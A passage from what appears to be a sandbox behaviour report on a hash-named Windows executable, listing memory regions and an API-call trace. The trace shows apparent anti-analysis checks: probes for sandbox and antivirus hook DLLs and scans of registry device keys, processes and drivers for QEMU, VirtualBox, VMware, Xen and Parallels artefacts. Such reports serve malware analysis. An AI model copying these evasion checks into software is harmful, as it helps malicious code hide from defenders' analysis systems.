"private_0x00000000001c0000" filename = "" Region: id = 360 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 361 start_va = 0x76600000 end_va = 0x7667afff monitored = 0 entry_point = 0x7661e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 362 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 363 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 364 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 365 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 366 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 367 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 368 start_va = 0x1db0000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 369 start_va = 0x74eb0000 end_va = 0x762aefff monitored = 0 entry_point = 0x7506b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 370 start_va = 0x76800000 end_va = 0x76836fff monitored = 0 entry_point = 0x76803b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 371 start_va = 0x745b0000 end_va = 0x74aa8fff monitored = 0 entry_point = 0x747b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 372 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 373 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 374 start_va = 0x76d50000 end_va = 0x76d5bfff monitored = 0 entry_point = 0x76d53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 375 start_va = 0x74520000 end_va = 0x745acfff monitored = 0 entry_point = 0x74569b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 376 start_va = 0x76470000 end_va = 0x764b3fff monitored = 0 entry_point = 0x76477410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 377 start_va = 0x73f20000 end_va = 0x73f2efff monitored = 0 entry_point = 0x73f22e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 378 start_va = 0x1db0000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 379 start_va = 0x1ed0000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 380 start_va = 0x1ee0000 end_va = 0x205afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 381 start_va = 0x2060000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 382 start_va = 0x1d0000 end_va = 0x1d5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 383 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 788 start_va = 0x450000 end_va = 0x465fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Thread: id = 3 os_tid = 0x1374 [0083.510] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="kernel32" | out: DestinationString="kernel32") [0083.510] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x76720000) returned 0x0 [0083.510] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="user32" | out: DestinationString="user32") [0083.510] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x743d0000) returned 0x0 [0083.540] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="advapi32" | out: DestinationString="advapi32") [0083.540] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x76600000) returned 0x0 [0084.928] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="shell32" | out: DestinationString="shell32") [0084.928] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x74eb0000) returned 0x0 [0093.451] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0093.452] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4c6fd8 [0093.452] GetKeyboardLayoutList (in: nBuff=1, lpList=0x4c6fd8 | out: lpList=0x4c6fd8) returned 1 [0093.452] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fb0c | out: TokenHandle=0x19fb0c*=0x150) returned 1 [0093.452] GetTokenInformation (in: TokenHandle=0x150, TokenInformationClass=0x19, TokenInformation=0x19fb10, TokenInformationLength=0x14, ReturnLength=0x19fb08 | out: TokenInformation=0x19fb10, ReturnLength=0x19fb08) returned 1 [0093.453] ExpandEnvironmentStringsW (in: lpSrc="%systemroot%\\system32\\ntdll.dll", lpDst=0x19fd4c, nSize=0x104 | out: lpDst="C:\\Windows\\system32\\ntdll.dll") returned 0x1e [0093.453] CreateFileW (lpFileName="C:\\Windows\\system32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0093.453] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x1000002, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x158 [0093.453] MapViewOfFile (hFileMappingObject=0x158, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1ee0000 [0093.456] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd50, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe")) returned 0x62 [0093.456] wcsstr (_Str="C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe", _SubStr="7869.vmt") returned 0x0 [0093.457] NtQuerySystemInformation (in: SystemInformationClass=0x67, SystemInformation=0x19ff4c, Length=0x8, ResultLength=0x0 | out: SystemInformation=0x19ff4c, ResultLength=0x0) returned 0x0 [0093.457] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x19ff54, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ff54, ReturnLength=0x0) returned 0x0 [0093.457] GetModuleHandleA (lpModuleName="sbiedll") returned 0x0 [0093.457] GetModuleHandleA (lpModuleName="aswhook") returned 0x0 [0093.457] GetModuleHandleA (lpModuleName="snxhk") returned 0x0 [0093.457] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x4c8958 [0093.457] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" [0093.457] RtlInitUnicodeString (in: DestinationString=0x19ff20, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") [0093.457] NtOpenKey (in: KeyHandle=0x19ff40, DesiredAccess=0x9, ObjectAttributes=0x19ff28*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x19ff40*=0x0) returned 0xc0000034 [0093.458] LocalFree (hMem=0x4c8958) returned 0x0 [0093.458] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x4c8958 [0093.458] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" [0093.458] RtlInitUnicodeString (in: DestinationString=0x19ff20, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") [0093.458] NtOpenKey (in: KeyHandle=0x19ff40, DesiredAccess=0x9, ObjectAttributes=0x19ff28*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x19ff40*=0x15c) returned 0x0 [0093.458] NtQueryKey (in: KeyHandle=0x15c, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0093.458] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x4ca258 [0093.458] NtQueryKey (in: KeyHandle=0x15c, KeyInformationClass=0x2, KeyInformation=0x4ca258, Length=0x2c, ResultLength=0x19ff48 | out: KeyInformation=0x4ca258, ResultLength=0x19ff48) returned 0x0 [0093.458] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0093.459] LocalAlloc (uFlags=0x40, uBytes=0x4e) returned 0x4caaf8 [0093.459] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x4caaf8, Length=0x4e, ResultLength=0x19ff48 | out: KeyInformation=0x4caaf8, ResultLength=0x19ff48) returned 0x0 [0093.459] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="qemu") returned 0x0 [0093.459] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="virtio") returned 0x0 [0093.459] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="vmware") returned 0x0 [0093.459] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="vbox") returned 0x0 [0093.459] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="xen") returned 0x0 [0093.460] LocalFree (hMem=0x4caaf8) returned 0x0 [0093.460] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0093.460] LocalAlloc (uFlags=0x40, uBytes=0x44) returned 0x4caaf8 [0093.460] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x4caaf8, Length=0x44, ResultLength=0x19ff48 | out: KeyInformation=0x4caaf8, ResultLength=0x19ff48) returned 0x0 [0093.461] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="qemu") returned 0x0 [0093.461] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="virtio") returned 0x0 [0093.461] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="vmware") returned 0x0 [0093.461] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="vbox") returned 0x0 [0093.461] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="xen") returned 0x0 [0093.461] LocalFree (hMem=0x4caaf8) returned 0x0 [0093.461] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0093.461] LocalAlloc (uFlags=0x40, uBytes=0x46) returned 0x4caaf8 [0093.461] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x4caaf8, Length=0x46, ResultLength=0x19ff48 | out: KeyInformation=0x4caaf8, ResultLength=0x19ff48) returned 0x0 [0093.462] wcsstr (_Str="cdrom&ven_lg&prod_gh24nsb0", _SubStr="qemu") returned 0x0 [0093.462] wcsstr (_Str="cdrom&ven_lg&prod_gh24nsb0", _SubStr="virtio") returned 0x0 [0093.462] wcsstr (_Str="cdrom&ven_lg&prod_gh24nsb0", _SubStr="vmware") returned 0x0 [0093.462] wcsstr (_Str="cdrom&ven_lg&prod_gh24nsb0", _SubStr="vbox") returned 0x0 [0093.462] wcsstr (_Str="cdrom&ven_lg&prod_gh24nsb0", _SubStr="xen") returned 0x0 [0093.462] LocalFree (hMem=0x4caaf8) returned 0x0 [0093.462] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0093.462] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x4caaf8 [0093.462] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x4caaf8, Length=0x50, ResultLength=0x19ff48 | out: KeyInformation=0x4caaf8, ResultLength=0x19ff48) returned 0x0 [0093.463] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="qemu") returned 0x0 [0093.463] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="virtio") returned 0x0 [0093.463] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="vmware") returned 0x0 [0093.463] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="vbox") returned 0x0 [0093.463] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="xen") returned 0x0 [0093.463] LocalFree (hMem=0x4caaf8) returned 0x0 [0093.463] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0093.463] LocalAlloc (uFlags=0x40, uBytes=0x46) returned 0x4caaf8 [0093.464] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x4caaf8, Length=0x46, ResultLength=0x19ff48 | out: KeyInformation=0x4caaf8, ResultLength=0x19ff48) returned 0x0 [0093.464] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="qemu") returned 0x0 [0093.464] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="virtio") returned 0x0 [0093.464] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="vmware") returned 0x0 [0093.464] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="vbox") returned 0x0 [0093.464] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="xen") returned 0x0 [0093.465] LocalFree (hMem=0x4caaf8) returned 0x0 [0093.465] LocalFree (hMem=0x4ca258) returned 0x0 [0093.465] NtClose (Handle=0x15c) returned 0x0 [0093.465] LocalFree (hMem=0x4c8958) returned 0x0 [0093.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x19ff54 | out: SystemInformation=0x0, ResultLength=0x19ff54*=0x1b480) returned 0xc0000004 [0093.528] LocalAlloc (uFlags=0x40, uBytes=0x1c480) returned 0x1db2050 [0093.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1db2050, Length=0x1c480, ResultLength=0x19ff54 | out: SystemInformation=0x1db2050, ResultLength=0x19ff54*=0x152f0) returned 0x0 [0093.534] wcsstr (_Str="system", _SubStr="qemu-ga.exe") returned 0x0 [0093.534] wcsstr (_Str="system", _SubStr="qga.exe") returned 0x0 [0093.534] wcsstr (_Str="system", _SubStr="windanr.exe") returned 0x0 [0093.534] wcsstr (_Str="system", _SubStr="vboxservice.exe") returned 0x0 [0093.534] wcsstr (_Str="system", _SubStr="vboxtray.exe") returned 0x0 [0093.534] wcsstr (_Str="system", _SubStr="vmtoolsd.exe") returned 0x0 [0093.534] wcsstr (_Str="system", _SubStr="prl_tools.exe") returned 0x0 [0093.534] wcsstr (_Str="smss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0093.534] wcsstr (_Str="smss.exe", _SubStr="qga.exe") returned 0x0 [0093.534] wcsstr (_Str="smss.exe", _SubStr="windanr.exe") returned 0x0 [0093.534] wcsstr (_Str="smss.exe", _SubStr="vboxservice.exe") returned 0x0 [0093.534] wcsstr (_Str="smss.exe", _SubStr="vboxtray.exe") returned 0x0 [0093.534] wcsstr (_Str="smss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0093.534] wcsstr (_Str="smss.exe", _SubStr="prl_tools.exe") returned 0x0 [0093.535] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0093.535] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0093.535] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0093.535] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0093.535] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0093.535] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0093.535] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0093.535] wcsstr (_Str="wininit.exe", _SubStr="qemu-ga.exe") returned 0x0 [0093.535] wcsstr (_Str="wininit.exe", _SubStr="qga.exe") returned 0x0 [0093.535] wcsstr (_Str="wininit.exe", _SubStr="windanr.exe") returned 0x0 [0093.535] wcsstr (_Str="wininit.exe", _SubStr="vboxservice.exe") returned 0x0 [0093.535] wcsstr (_Str="wininit.exe", _SubStr="vboxtray.exe") returned 0x0 [0093.535] wcsstr (_Str="wininit.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0093.535] wcsstr (_Str="wininit.exe", _SubStr="prl_tools.exe") returned 0x0 [0093.536] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0093.536] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0093.536] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0093.536] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0093.536] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0093.536] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0093.536] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0093.536] wcsstr (_Str="winlogon.exe", _SubStr="qemu-ga.exe") returned 0x0 [0093.536] wcsstr (_Str="winlogon.exe", _SubStr="qga.exe") returned 0x0 [0093.536] wcsstr (_Str="winlogon.exe", _SubStr="windanr.exe") returned 0x0 [0093.536] wcsstr (_Str="winlogon.exe", _SubStr="vboxservice.exe") returned 0x0 [0093.536] wcsstr (_Str="winlogon.exe", _SubStr="vboxtray.exe") returned 0x0 [0093.536] wcsstr (_Str="winlogon.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0093.536] wcsstr (_Str="winlogon.exe", _SubStr="prl_tools.exe") returned 0x0 [0093.537] wcsstr (_Str="services.exe", _SubStr="qemu-ga.exe") returned 0x0 [0093.537] wcsstr (_Str="services.exe", _SubStr="qga.exe") returned 0x0 [0093.537] wcsstr (_Str="services.exe", _SubStr="windanr.exe") returned 0x0 [0093.537] wcsstr (_Str="services.exe", _SubStr="vboxservice.exe") returned 0x0 [0093.537] wcsstr (_Str="services.exe", _SubStr="vboxtray.exe") returned 0x0 [0093.537] wcsstr (_Str="services.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0093.537] wcsstr (_Str="services.exe", _SubStr="prl_tools.exe") returned 0x0 [0093.537] wcsstr (_Str="lsass.exe", _SubStr="qemu-ga.exe") returned 0x0 [0093.537] wcsstr (_Str="lsass.exe", _SubStr="qga.exe") returned 0x0 [0093.537] wcsstr (_Str="lsass.exe", _SubStr="windanr.exe") returned 0x0 [0093.537] wcsstr (_Str="lsass.exe", _SubStr="vboxservice.exe") returned 0x0 [0093.537] wcsstr (_Str="lsass.exe", _SubStr="vboxtray.exe") returned 0x0 [0093.537] wcsstr (_Str="lsass.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0093.537] wcsstr (_Str="lsass.exe", _SubStr="prl_tools.exe") returned 0x0 [0093.538] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0093.538] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0093.538] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0093.538] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0093.538] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0093.538] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0093.538] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0093.538] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0093.538] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0093.538] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0093.538] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0093.538] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0093.538] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0093.539] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0093.539] wcsstr (_Str="dwm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0093.539] wcsstr (_Str="dwm.exe", _SubStr="qga.exe") returned 0x0 [0093.539] wcsstr (_Str="dwm.exe", _SubStr="windanr.exe") returned 0x0 [0093.539] wcsstr (_Str="dwm.exe", _SubStr="vboxservice.exe") returned 0x0 [0093.539] wcsstr (_Str="dwm.exe", _SubStr="vboxtray.exe") returned 0x0 [0093.539] wcsstr (_Str="dwm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0093.539] wcsstr (_Str="dwm.exe", _SubStr="prl_tools.exe") returned 0x0 [0093.541] LocalFree (hMem=0x1db2050) returned 0x0 [0093.541] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x0, Length=0x0, ResultLength=0x19ff54 | out: SystemInformation=0x0, ResultLength=0x19ff54*=0x991c) returned 0xc0000004 [0093.541] LocalAlloc (uFlags=0x40, uBytes=0xa91c) returned 0x1db2050 [0093.541] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x1db2050, Length=0xa91c, ResultLength=0x19ff54 | out: SystemInformation=0x1db2050, ResultLength=0x19ff54*=0x991c) returned 0x0 [0093.542] strstr (_Str="ntoskrnl.exe", _SubStr="vmci.s") returned 0x0 [0093.542] strstr (_Str="ntoskrnl.exe", _SubStr="vmusbm") returned 0x0 [0093.542] strstr (_Str="ntoskrnl.exe", _SubStr="vmmous") returned 0x0 [0093.542] strstr (_Str="ntoskrnl.exe", _SubStr="vm3dmp") returned 0x0 [0093.542] strstr (_Str="ntoskrnl.exe", _SubStr="vmrawd") returned 0x0 [0093.542] strstr (_Str="ntoskrnl.exe", _SubStr="vmmemc") returned 0x0 [0093.542] strstr (_Str="ntoskrnl.exe", _SubStr="vboxgu") returned 0x0 [0093.542] strstr (_Str="ntoskrnl.exe", _SubStr="vboxsf") returned 0x0 [0093.542] strstr (_Str="ntoskrnl.exe", _SubStr="vboxmo") returned 0x0 [0093.542] strstr (_Str="ntoskrnl.exe", _SubStr="vboxvi") returned 0x0 [0093.542] strstr (_Str="ntoskrnl.exe", _SubStr="vboxdi") returned 0x0 [0093.542] strstr (_Str="ntoskrnl.exe", _SubStr="vioser") returned 0x0 [0093.543] strstr (_Str="hal.dll", _SubStr="vmci.s") returned 0x0 [0093.543] strstr (_Str="hal.dll", _SubStr="vmusbm") returned 0x0 [0093.543] strstr (_Str="hal.dll", _SubStr="vmmous") returned 0x0 [0093.543] strstr (_Str="hal.dll", _SubStr="vm3dmp") returned 0x0 [0093.543] strstr (_Str="hal.dll", _SubStr="vmrawd") returned 0x0 [0093.543] strstr (_Str="hal.dll", _SubStr="vmmemc") returned 0x0 [0093.543] strstr (_Str="hal.dll", _SubStr="vboxgu") returned 0x0 [0093.543] strstr (_Str="hal.dll", _SubStr="vboxsf") returned 0x0 [0093.543] strstr (_Str="hal.dll", _SubStr="vboxmo") returned 0x0 [0093.543] strstr (_Str="hal.dll", _SubStr="vboxvi") returned 0x0 [0093.543] strstr (_Str="hal.dll", _SubStr="vboxdi") returned 0x0 [0093.543] strstr (_Str="hal.dll", _SubStr="vioser") returned 0x0 [0093.543] strstr (_Str="kd.dll", _SubStr="vmci.s") returned 0x0 [0093.543] strstr (_Str="kd.dll", _SubStr="vmusbm") returned 0x0 [0093.543] strstr (_Str="kd.dll", _SubStr="vmmous") returned 0x0 [0093.543] strstr (_Str="kd.dll", _SubStr="vm3dmp") returned 0x0 [0093.543] strstr (_Str="kd.dll", _SubStr="vmrawd") returned 0x0 [0093.543] strstr (_Str="kd.dll", _SubStr="vmmemc") returned 0x0 [0093.543] strstr (_Str="kd.dll", _SubStr="vboxgu") returned 0x0 [0093.544] strstr (_Str="kd.dll", _SubStr="vboxsf") returned 0x0 [0093.544] strstr (_Str="kd.dll", _SubStr="vboxmo") returned 0x0 [0093.544] strstr (_Str="kd.dll", _SubStr="vboxvi") returned 0x0 [0093.544] strstr (_Str="kd.dll", _SubStr="vboxdi") returned 0x0 [0093.544] strstr (_Str="kd.dll", _SubStr="vioser") returned 0x0 [0093.545] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmci.s") returned 0x0 [0093.545] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmusbm") returned 0x0 [0093.545] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmous") returned 0x0 [0093.545] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vm3dmp") returned 0x0 [0093.545] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmrawd") returned 0x0 [0093.545] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmemc") returned 0x0 [0093.545] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxgu") returned 0x0 